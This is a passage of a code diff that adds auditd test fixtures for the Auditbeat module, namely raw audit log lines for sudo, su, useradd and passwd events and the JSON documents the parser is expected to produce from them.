acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "cmd": "bash", + "terminal": "pts/1" + }, + "message_type": "user_cmd", + "result": "success", + "sequence": 460, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "oldbob" + }, + "object": { + "primary": "bash", + "type": "process" + } + } + }, + "event": { + "action": "ran-command", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=USER_CMD msg=audit(1610876676.623:460): pid=14178 uid=1002 auid=1002 ses=15 msg='cwd=\"/home/alice\" cmd=\"bash\" terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 14178, + "working_directory": "/home/alice" + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_refr", + "result": "success", + "sequence": 461, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "refreshed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_REFR msg=audit(1610876676.623:461): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"bob\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "bob", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "hostname": "localhost", + "op": "PAM:session_open", + "terminal": "/dev/pts/1" + }, + "message_type": "user_start", + "result": "success", + "sequence": 462, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610876676.623:462): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct=\"bob\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "bob", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "127.0.0.1" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "fail", + "sequence": 457, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610876634.103:457): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=failed'" + ], + "outcome": "failure", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_acq", + "result": "success", + "sequence": 434, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "acquired-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_ACQ msg=audit(1610735886.818:434): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:accounting", + "terminal": "/dev/pts/1" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 433, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610735886.818:433): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:accounting acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 432, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610735886.818:432): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:authentication acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "hostname": "localhost", + "op": "PAM:session_open", + "terminal": "/dev/pts/1" + }, + "message_type": "user_start", + "result": "success", + "sequence": 431, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610735886.818:431): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct=\"root\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "127.0.0.1" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_refr", + "result": "success", + "sequence": 430, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "refreshed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_REFR msg=audit(1610735886.818:430): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "cmd": "su", + "terminal": "pts/1" + }, + "message_type": "user_cmd", + "result": "success", + "sequence": 429, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "oldbob" + }, + "object": { + "primary": "su", + "type": "process" + } + } + }, + "event": { + "action": "ran-command", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=USER_CMD msg=audit(1610735886.818:429): pid=11791 uid=1002 auid=1002 ses=15 msg='cwd=\"/home/alice\" cmd=\"su\" terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 11791, + "working_directory": "/home/alice" + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:accounting", + "terminal": "/dev/pts/1" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 428, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610735886.818:428): pid=11791 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 427, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610735886.818:427): pid=11791 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "su", + "selected-context": "1234", + "terminal": "/dev/pts/1" + }, + "message_type": "user_role_change", + "result": "success", + "sequence": 436, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "1234", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-role-to", + "category": "mac", + "kind": "event", + "original": [ + "type=USER_ROLE_CHANGE msg=audit(1610735886.822:436): pid=11793 uid=0 auid=1002 ses=15 msg='op=su acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success selected-context=1234'" + ], + "outcome": "success" + }, + "process": { + "executable": "/bin/su", + "pid": 11793 + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "id": "0", + "name": "root" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "hostname": "localhost", + "op": "PAM:session_open", + "terminal": "/dev/pts/1" + }, + "message_type": "user_start", + "result": "success", + "sequence": 435, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610735886.822:435): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "127.0.0.1" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_disp", + "result": "success", + "sequence": 440, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "disposed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_DISP msg=audit(1610735949.474:440): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:session_close", + "terminal": "/dev/pts/1" + }, + "message_type": "user_end", + "result": "success", + "sequence": 439, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "ended-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_END msg=audit(1610735949.474:439): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:session_close acct=\"root\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_disp", + "result": "success", + "sequence": 438, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "disposed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_DISP msg=audit(1610735949.474:438): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:session_close", + "terminal": "/dev/pts/1" + }, + "message_type": "user_end", + "result": "success", + "sequence": 437, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "ended-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_END msg=audit(1610735949.474:437): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:session_close acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/useradd.log b/auditbeat/module/auditd/testdata/useradd.log new file mode 100644 index 000000000000..3f99f5e3b41f --- /dev/null +++ b/auditbeat/module/auditd/testdata/useradd.log @@ -0,0 +1,8 @@ +type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe="/usr/sbin/useradd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe="/sbin/pam_tally2" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success' +type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct="charlie" exe="/usr/bin/passwd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct="root" exe="/usr/bin/chfn" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct="root" exe="/usr/bin/chfn" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' diff --git a/auditbeat/module/auditd/testdata/useradd.log-expected.json b/auditbeat/module/auditd/testdata/useradd.log-expected.json new file mode 100644 index 000000000000..b737a91893b1 --- /dev/null +++ b/auditbeat/module/auditd/testdata/useradd.log-expected.json @@ -0,0 +1,551 @@ +[ + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1004", + "op": "adding", + "terminal": "pts/2" + }, + "message_type": "add_group", + "result": "success", + "sequence": 584, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/groupadd", + "object": { + "primary": "1004", + "type": "account" + } + } + }, + "event": { + "action": "added-group-account-to", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "group", + "creation" + ] + }, + "group": { + "id": "1004", + "name": "testgroup" + }, + "process": { + "executable": "/usr/sbin/groupadd", + "pid": 2940 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1004", + "op": "adding", + "terminal": "pts/2" + }, + "message_type": "add_group", + "result": "success", + "sequence": 586, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/groupadd", + "object": { + "primary": "1004", + "type": "account" + } + } + }, + "event": { + "action": "added-group-account-to", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "group", + "creation" + ] + }, + "group": { + "id": "1004", + "name": "testgroup" + }, + "process": { + "executable": "/usr/sbin/groupadd", + "pid": 2940 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1004", + "terminal": "pts/2" + }, + "message_type": "add_group", + "result": "success", + "sequence": 587, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/groupadd", + "object": { + "primary": "1004", + "type": "account" + } + } + }, + "event": { + "action": "added-group-account-to", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "group", + "creation" + ] + }, + "group": { + "id": "1004", + "name": "testgroup" + }, + "process": { + "executable": "/usr/sbin/groupadd", + "pid": 2940 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1004", + "op": "adding", + "terminal": "pts/2" + }, + "message_type": "add_user", + "result": "success", + "sequence": 591, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/useradd", + "object": { + "primary": "1004", + "type": "account" + } + } + }, + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe=\"/usr/sbin/useradd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "creation" + ] + }, + "process": { + "executable": "/usr/sbin/useradd", + "pid": 2945 + }, + "related": { + "user": [ + "root", + "testuser", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "target": { + "id": "1004", + "name": "testuser" + } + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "localhost", + "reset": "0", + "terminal": "/dev/pts/2" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 593, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "testuser" + }, + "how": "/sbin/pam_tally2", + "object": { + "primary": "/dev/pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe=\"/sbin/pam_tally2\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/sbin/pam_tally2", + "pid": 2948 + }, + "related": { + "user": [ + "testuser", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "1004", + "name": "testuser" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "acct": "charlie", + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "op": "PAM:chauthtok", + "terminal": "pts/2" + }, + "message_type": "user_chauthtok", + "result": "success", + "sequence": 594, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "charlie" + }, + "how": "/usr/bin/passwd", + "object": { + "primary": "pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-password", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct=\"charlie\" exe=\"/usr/bin/passwd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/bin/passwd", + "pid": 2953 + }, + "related": { + "user": [ + "charlie", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "target": { + "id": "1003", + "name": "charlie" + } + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "op": "PAM:authentication", + "terminal": "pts/2" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 595, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/bin/chfn", + "object": { + "primary": "pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + 